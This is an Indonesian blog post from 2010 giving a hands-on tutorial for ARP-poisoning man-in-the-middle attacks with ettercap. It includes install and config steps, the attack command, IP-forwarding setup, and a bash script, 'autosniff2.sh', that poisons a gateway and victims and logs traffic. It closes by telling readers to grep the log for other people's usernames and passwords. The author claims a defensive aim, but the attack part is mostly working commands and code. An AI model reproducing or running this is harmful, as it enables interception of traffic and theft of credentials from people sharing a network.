Mohon tunggu...
rakhjib martapianur
rakhjib martapianur Mohon Tunggu... -

ke sederhanaanKu mengurungku daLam sepiku..hingga tak seorangpun tau bahwa aku ingin menjadi seperti kakekKu...:)

Selanjutnya

Tutup

Inovasi

./autosniff2.sh + Penjelasan

8 Desember 2010   00:54 Diperbarui: 26 Juni 2015   10:55 155
+
Laporkan Konten
Laporkan Akun
Kompasiana adalah platform blog. Konten ini menjadi tanggung jawab bloger dan tidak mewakili pandangan redaksi Kompas.
Lihat foto
Bagikan ide kreativitasmu dalam bentuk konten di Kompasiana | Sumber gambar: Freepik

[caption id="" align="alignnone" width="580" caption="bt"][/caption] assalamuallaikum... saLam sejahtera.. kali ini kita akan membahas tentang ettercap Ettercap adalah sebuah alat yang dibuat oleh Alberto Ornaghi (AloR) dan Marco Valleri (NaGa) dan pada dasarnya adalah sebuah perlengkapan untuk penyerangan “penengah” pada sebuah LAN ataupun WLAN. Untuk mereka yang tidak menyukai perintah berbaris (CLI), alat bentu ini disediakan dengan antar muka grafis yang mudah. Ettercap memungkinkan membentuk serangan melawan protokol ARP dengan memposisikan diri sebagai “penengah, orang yang ditengah” dan, jika sudah berada pada posisi tersebut, maka akan memungkinkan untuk : - menginfeksi, mengganti, menghapus data dalam sebuah koneksi - melihat password pada protokol-protokol seperti FTP, HTTP, POP, SSH1, dan lain-lain. - menyediakan SSL sertifikasi palsu dalam bagian HTTPS pada korban. - dan lain-lain. woow.,.bisa di bayangkan apa bahayanya jika mesin / computer kita..di bajak oleh seorang sniffer...:D hal ini tentu sangat merugikan kita sebagai seorang client.. baikLah..kali ini penulis akan menjelaskan bagaimana melakukan serangan ini.. penulis tidak mengajarkan temand-temand untuk menjadi seeorang sniffer.. melainkan hanya untuk memberitahukan bagaimana cara kerjanya saja.. dengan tujuan agar kita lebih berhati-hati pada saat terkoneksi ke internet.. 1 install ettercapnya dulu # sudo apt-get install ettercap 2. konfigurasi lach.,.:) # sudo gedit /etc/etter.conf cari baris ini.. ##################################### #       redir_command_on/off ##################################### # you must provide a valid script for your operating system in order to have # the SSL dissection available # note that the cleanup script is executed without enough privileges (because # they are dropped on startup). so you have to either: provide a setuid program # or set the ec_uid to 0, in order to be sure the cleanup script will be # executed properly # NOTE: this script is executed with an execve(), so you can't use pipes or # output redirection as if you were in a shell. We suggest you to make a script if # you need those commands. #--------------- #     Linux #--------------- # if you use ipchains: #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport" # if you use iptables: #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" hilangkan tanda ' # ' . kemudian save...ukey... 3. jalankan ettercapnya.. # sudo ettercap -Tq -i wlan0 -M arp // // penjelasan : -T = mode ettercapnya -i = interface yang aktif (bisa di lihat dg mengetikan ifconfig di terminal) -q quiet mode -M = arp poisoning sementara tanda // // adalah default gatway & client ini bisa di isi dengan ip victim (jika victim tunggal) jangan lupa forward ip juga ya... # echo 1 > /proc/sys/net/ipv4/ip_forward ukey.,.selesai...tinggal tunggu hasilnya saja.,.:) NB : jika belum familiar dengan console.. saya sudah siapkan sdkit script bashnya... jadi tinggal jalankan 1 script saja..udh bisa jalankan ettercap koq.. langsung copas scriptnya...:) --------------cut here----------------------------------------------- ######################################################## #                  c0de by yur4kh4                     # #                    auto sniff                        # #                Malang cyber crew                     # #        contact :yur4kh4[at]mc-crew[dot]net           # ######################################################## #!/bin/bash sleep 3 echo "jangan malas untuk menulis di console" sleep 2 echo -n "network card yang terkoneksi gan? ex: wlan0: " read -e IFACE echo -n "Gateway IP - biarkan kosong (default): " read -e ROUTER echo -n "Target IP - biarkan kosong (babat semua IP): " read -e VICTIM ettercap -Tq -i $IFACE -M arp /$ROUTER/ /$VICTIM/ -w yur4.txt --------------cut here----------------------------------------------- save dengan nama autosniff2.sh kemudian beri hak akses root # chmod +x autosniff2.sh masih di terminal jalankan dech scriptnya # ./autosniff2.sh tinggal tunggu saja... pastikan ettercap sudah di install & sudah di konfigurasi dengan benar... pastikan juga bahwa ip sudah di forward.. untuk berhenti tekan ' q ' 'Q' < script ini akan menghasilkan log yur4.txt buka hasil log tersebut... menggunakan kate or apa saja lach yang penting bisa terbaca...:p kemudian search or ctrl F masukan keywords "pass" atau bisa juga "user" heee.,. kalo ada yang tersniffing maka akan tampil tu user sama pass orang.,.:p

Mohon tunggu...

Lihat Inovasi Selengkapnya
Beri Komentar
Berkomentarlah secara bijaksana dan bertanggung jawab. Komentar sepenuhnya menjadi tanggung jawab komentator seperti diatur dalam UU ITE

Belum ada komentar. Jadilah yang pertama untuk memberikan komentar!
LAPORKAN KONTEN
Alasan
Laporkan Konten
Laporkan Akun